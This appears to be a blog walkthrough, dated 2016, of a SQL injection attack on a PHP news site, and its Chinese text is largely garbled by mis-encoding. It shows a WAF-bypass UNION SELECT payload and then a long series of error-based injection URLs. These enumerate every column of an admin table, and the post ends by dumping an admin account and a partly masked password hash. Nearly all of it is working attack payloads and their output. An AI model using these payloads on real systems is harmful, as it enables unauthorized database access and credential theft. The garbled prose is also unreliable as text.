
ˮ

Щǵ΢âջΪȼ֮

 
 
 
 
 


 
 

һζƵע  

2016-10-24 21:36:29|  ࣺ ѧϰ· |  ǩ |ٱ |ֺС 


һ wafιؼ
http://xxxx/newsview.php
?id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/NULL,table_name/**//*!FRoM*//**/(/*!sElEcT*//**/group_concat(table_name) as table_name as table_name/**//*!FRom*/ information_schema.tables where table_schema = database()) as t

group_concat(table_name)סˣ  xxoo(param1,param2) ʽñwafƥ䣬...



ôõ :ע벻 wafƷΧڣ
http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


ʼֶ~
http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :AdminID

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID'  LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :AdminEmail


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :AdminPwd


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :AdminName

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :AdminTel

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :AdminPhoto

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :AdminBackground



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :AdminGender



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :AdminRemark



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :WhyInterested


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :WhatPresenting



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :RegTime


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :LastUpdateTime

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime'  and column_name != 'LastUpdateTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


字段 :LastLoginTime


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime'  and column_name != 'LastUpdateTime' and column_name != 'LastLoginTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

字段 :LoginTimes



得到 :
表名:htx_admin

AdminID
AdminEmail
AdminPwd
AdminName
AdminTel
AdminPhoto
AdminBackground
AdminGender
AdminRemark
WhyInterested
WhatPresenting
RegTime
LastUpdateTime
LastLoginTime
LoginTimes


ֶȫˣʼѯֶ
http://xxxx/newsview.php?id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/AdminEmail,AdminPwd/**//*!FRoM*//**/htx_admin

账号 :DPAdmin
:3953xxxxxxxxxxxFxxxDx44
...
 
 